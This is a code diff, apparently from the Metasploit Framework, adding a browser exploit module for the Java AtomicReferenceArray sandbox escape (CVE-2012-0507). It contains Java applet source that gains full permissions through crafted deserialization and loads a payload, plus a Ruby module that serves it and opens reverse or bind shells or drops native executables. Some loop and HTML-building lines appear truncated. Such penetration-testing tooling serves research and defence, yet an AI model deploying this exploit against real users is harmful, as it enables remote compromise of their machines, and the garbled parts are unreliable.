diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar new file mode 100644 index 0000000000..e0c2d68188 Binary files /dev/null and b/data/exploits/CVE-2012-0507.jar differ diff --git a/external/source/exploits/CVE-2012-0507/Exploit.java b/external/source/exploits/CVE-2012-0507/Exploit.java new file mode 100644 index 0000000000..3a1f899b9e --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/Exploit.java @@ -0,0 +1,58 @@ +package a; + +import java.applet.Applet; +import java.io.ByteArrayInputStream; +import java.io.ObjectInputStream; +import java.util.concurrent.atomic.AtomicReferenceArray; +import a.*; + +// Referenced classes of package a: +// Help + +public class Exploit extends Applet +{ + + public Exploit() + { + } + + public static byte[] StringToBytes(String s) + { + byte abyte0[] = new byte[s.length() / 2]; + for(int i = 0; i < s.length(); i += 2) + abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); + + return abyte0; + } + + public void init() + { + try + { + String as[] = { + "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" + }; + StringBuilder stringbuilder = new StringBuilder(); + for(int i = 0; i < as.length; i++) + stringbuilder.append(as[i]); + + ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString()))); + Object aobj[] = (Object[])(Object[])objectinputstream.readObject(); + Help ahelp[] = (Help[])(Help[])aobj[0]; + AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1]; + ClassLoader classloader = getClass().getClassLoader(); + atomicreferencearray.set(0, classloader); + Help _tmp = ahelp[0]; + + String data = getParameter( "data" ); + String jar = getParameter( "jar" ); + String lhost = getParameter( "lhost" ); + String lport = getParameter( "lport" ); + System.out.println("go go go"); + Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); + } + catch(Exception exception) { + System.out.println(exception.getMessage()); + } + } +} diff --git a/external/source/exploits/CVE-2012-0507/Help.java b/external/source/exploits/CVE-2012-0507/Help.java new file mode 100644 index 0000000000..f340a77161 --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/Help.java @@ -0,0 +1,82 @@ +package a; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.net.URL; +import java.security.AllPermission; +import java.security.CodeSource; +import java.security.Permissions; +import java.security.ProtectionDomain; +import java.security.cert.Certificate; +import java.lang.reflect.Field; + +public class Help extends ClassLoader implements Serializable{ + public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { + + String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; + String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; + Class cls = null; + + try + { + for( int index=0 ; index 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + URL url = new URL( "file:///" ); + + Certificate[] certs = new Certificate[0]; + + Permissions perm = new Permissions(); + perm.add( new AllPermission() ); + + ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); + + cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); + Class class_cls = cls.getClass(); + System.out.println("The type of the object is: " + class_cls.getName()); + } + + // cls will end up being the PayloadX class + if( cls != null ) + { + // reflect into the PayloadX class to get these three fields + Field payload_data = cls.getField( "data" ); + Field payload_jar = cls.getField( "jar" ); + Field payload_lhost = cls.getField( "lhost" ); + Field payload_lport = cls.getField( "lport" ); + + // instantiate the PayloadX object once so as we can set the native payload data + Object obj = cls.newInstance(); + + // set the native payload data, lhost and lport + payload_data.set( obj, data ); + payload_jar.set( obj, jar ); + payload_lhost.set( obj, lhost ); + payload_lport.setInt( obj, lport ); + + // instantiate a second PayloadX object to perform the actual payload + obj = cls.newInstance(); + } + } + catch( Exception e ) { + System.out.println(e.getMessage()); + } + } +} + diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb new file mode 100644 index 0000000000..1ce83d4457 --- /dev/null +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -0,0 +1,173 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability due to the fact that + AtomicReferenceArray uses the Unsafe class to store a reference in an + array directly, which may violate type safety if not used properly. + This allows a way to escape the JRE sandbox, and load additional classes + in order to perform malicious operations. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sinn3r', # metasploit module + 'juan vazquez' # metasploit module + ], + 'References' => + [ + ['CVE', '2012-0507'], + ['BID', '52161'], + ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], + ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 14 2012' + )) + end + + + def exploit + # load the static jar file + path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) + fd = File.open( path, "rb" ) + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + + def on_request_uri( cli, request ) + data = nil + host = nil + port = nil + peer = "#{cli.peerhost}:#{cli.peerport}" + + if not request.uri.match(/\.jar$/i) + if not request.uri.match(/\/$/) + send_redirect( cli, get_resource() + '/', '') + return + end + + print_status("#{peer} - Sending #{self.name}") + + payload = regenerate_payload( cli ) + if not payload + print_error("#{peer} - Failed to generate the payload." ) + return + end + + if target.name == 'Generic (Java Payload)' + if datastore['LHOST'] + jar = payload.encoded + host = datastore['LHOST'] + port = datastore['LPORT'] + vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) + else + port = datastore['LPORT'] + datastore['RHOST'] = cli.peerhost + vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) + end + if jar + print_status( "Generated jar to drop (#{jar.length} bytes)." ) + jar = Rex::Text.to_hex( jar, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + else + + # NOTE: The EXE mixin automagically handles detection of arch/platform + data = generate_payload_exe + + if data + print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) + data = Rex::Text.to_hex( data, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + + end + + send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) + return + end + + print_status( "#{peer} - sending jar to ..." ) + send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) + + handler( cli ) + end + + def generate_html( data, jar, host, port ) + html = "" + html += "" + html += "" + html += "" if data + html += "" if jar + html += "" if host + html += "" if port + html += "" + return html + end + + def generate_jar() + return @jar_data + end + +end